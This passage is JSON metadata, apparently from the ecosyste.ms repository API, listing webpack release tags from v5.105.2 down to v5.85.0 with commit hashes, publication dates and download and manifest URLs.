ck%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha"